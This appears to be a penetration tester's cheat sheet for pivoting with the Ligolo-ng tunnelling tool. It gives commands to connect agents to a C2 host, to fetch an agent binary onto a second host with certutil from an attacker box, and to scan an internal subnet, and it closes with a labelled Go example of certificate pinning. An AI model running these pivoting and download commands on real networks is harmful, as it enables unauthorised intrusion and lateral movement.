Operator On The Wire

Ligolo

Prerequisites

Linux

Create a TUN interface on the proxy (attack) server:

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

On Ligolo-ng >= v0.6, you can instead let Ligolo create the interface from the proxy console:

interface_create --name "evil-cha"

Windows

Download the Wintun driver (used by WireGuard) and place wintun.dll in the same folder as Ligolo.
Make sure the DLL architecture (32/64-bit) matches the Ligolo binary.

Quickstart Flow

1. Start Proxy (Kali / C2)

sudo ./proxy -selfcert   # Use self-signed certificates

interface_create --name "evil-cha"

2. Start Agent (Pivot Host)

# Basic connect
./agent -connect attacker_c2_server.com:11601

# Ignore certificate validation (lab only)
./agent -connect attacker_c2_server.com:11601 -ignore-cert

# Using IP + fingerprint (recommended with -selfcert)
./agent -connect 10.10.14.207:11601 -v -accept-fingerprint <FINGERPRINT>

# Lab/debugging: ignore all certificate checks
./agent -connect 10.10.14.207:11601 -v -ignore-cert

3. Select Session on Proxy

ligolo-ng » session

Pick the agent you want to pivot through.

4. Start Tunnel Interface

tunnel_start --tun evil-cha

5. Add Routes via Tunnel

interface_add_route --name evil-cha --route 192.168.2.0/24

Now you can route traffic from your attack box to 192.168.2.0/24 via the Ligolo tunnel.

6. Session A > Remote Listener

# EXPOSE PIVOT HUB
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# EXPOSE KALI SERVER
listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000 --tcp

7. Box B > Connect to Main

# RETRIEVE BINARY
certutil -urlcache -f -split http://BOX_A_IP:8000/windows/agent.exe

./agent -connect Box_A:11601 -ignore-cert

8. Create New Interface for Session B

9. Tunnel > etc

nmap -sS -F 172.16.8.0/24 -v -Pn --disable-arp-ping

TLS Options

Using Let's Encrypt (-autocert)

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 must be accessible for Let's Encrypt HTTP validation.

Using Custom Certificates (-certfile / -keyfile)

You can specify your own TLS certificate and key for the proxy:

./proxy -certfile server.crt -keyfile server.key

Self-Signed Certificates (-selfcert)

The proxy/relay can automatically generate self-signed certificates:

./proxy -selfcert

Validating Self-Signed Fingerprint (recommended)

Print the certificate fingerprint in the proxy console:

ligolo-ng » certificate_fingerprint
# INFO[0203] TLS Certificate fingerprint for ligolo is: D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC

Then connect the agent with:

ligolo-agent -connect 127.0.0.1:11601 -v -accept-fingerprint D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC

Ignoring All Certificate Verification (lab/debug only)

./agent -connect 127.0.0.1:11601 -v -ignore-cert

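Beware of MITM attacks: with -ignore-cert the agent accepts any certificate, so it cannot tell the real proxy from an interceptor. This should only be used in test labs or for debugging.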
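
What -accept-fingerprint checks and -ignore-cert skips, as an added example (not code from the original page or from the Ligolo-ng project). It assumes the fingerprint is the uppercase hex SHA-256 of the proxy's DER-encoded certificate, consistent with the 64-digit value shown above; Fingerprint, VerifyPinned and SelfSigned are hypothetical names, and both certificates are generated in-process as sample input.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// Fingerprint returns the uppercase hex SHA-256 of a DER certificate (assumed format).
func Fingerprint(der []byte) string {
	sum := sha256.Sum256(der)
	return fmt.Sprintf("%X", sum[:])
}

// VerifyPinned returns a callback usable as tls.Config.VerifyPeerCertificate.
func VerifyPinned(pin string) func([][]byte, [][]*x509.Certificate) error {
	return func(raw [][]byte, _ [][]*x509.Certificate) error {
		if len(raw) == 0 {
			return errors.New("peer presented no certificate")
		}
		// raw[0] is the leaf certificate exactly as the peer sent it.
		if !strings.EqualFold(Fingerprint(raw[0]), pin) {
			return errors.New("certificate does not match pinned fingerprint")
		}
		return nil
	}
}

// SelfSigned builds a throwaway certificate (constructed sample input, errors ignored).
func SelfSigned(cn string) []byte {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	t := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: cn},
		NotBefore: time.Now(), NotAfter: time.Now().Add(time.Hour)}
	der, _ := x509.CreateCertificate(rand.Reader, t, t, pub, priv)
	return der
}

func main() {
	proxy, other := SelfSigned("ligolo"), SelfSigned("ligolo") // same name, different keys
	check := VerifyPinned(Fingerprint(proxy))
	fmt.Println(check([][]byte{proxy}, nil), check([][]byte{other}, nil))
}
```

The second certificate carries the same subject name but a different key, so only the pin tells the two apart; a client that skips verification would accept both.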